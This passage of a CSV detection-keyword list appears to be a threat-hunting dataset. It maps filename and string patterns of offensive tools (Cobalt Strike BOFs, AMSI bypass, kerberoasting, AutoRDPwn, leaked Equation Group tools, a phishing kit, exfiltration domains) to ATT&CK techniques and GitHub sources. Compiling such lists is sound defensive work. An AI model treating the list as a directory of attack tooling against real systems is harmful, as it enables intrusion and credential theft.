T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" +"*Attack_AmsiScanBuffer.ps1*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" +"*--attacker-page *","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*AttackerSetup(windows).exe*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*AttackerSetup.py*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*AttackerSetup4linux*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. 
This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*AttackSurfaceMapper-master*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*AttackTeamFamily*-bof-toolset*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Attempted to spawn a socks proxy server at 0.0.0.0:*","offensive_tool_keyword","CSExec","An alternative to *exec.py from 
impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Attempting connection from 0.0.0.0:*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*AttifyOS*","offensive_tool_keyword","attifyos","AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.","T1559 - T1565 - T1210 - T1189 - T1110","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/adi0x90/attifyos","1","0","N/A","N/A","9","871","159","2021-08-26T13:31:13Z","2017-07-17T01:40:25Z" +"*attrib +s +h desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*Auditcleaner.*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" 
+"*Augustus-main.zip*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*ausecwa/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*auth/cc2_ssh.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*auto_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_exploit_blank_password*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*auto_pass_the_hash.*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*auto_pass_the_hash.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_linux.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*autobloody -*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody-main*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell 
designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*AutoC2.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/All.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/C2*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Dependencies*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Initial_Access*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to 
install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Lateral.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Payload_Development*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Recon*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Situational_Awareness*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Social.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team 
tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Staging*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Web.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Wireless.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Wordlists*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoCompletionHandlerC2ServerManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - 
T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*autodiscover/brute.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*autoexploit.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*autokerberoast.ps1*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autokerberoast_noMimikatz.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autoKirbi2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autolace.twilightparadox.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
+"*automachine.servequake.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*AutoNSE*","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*autopwn*","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. 
This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tools","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","4","375","102","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z" +"*AutoRDPwn*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*AutoSmuggle.csproj*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.exe*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.sln*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle-master*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*autostart/ares.desktop*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*autoTGS_NtlmCrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autotimeline *","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","0","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*autotimeline.py*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*autotimeliner.git*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*aux/dump_credentials*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*aux/enum_system.rc*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
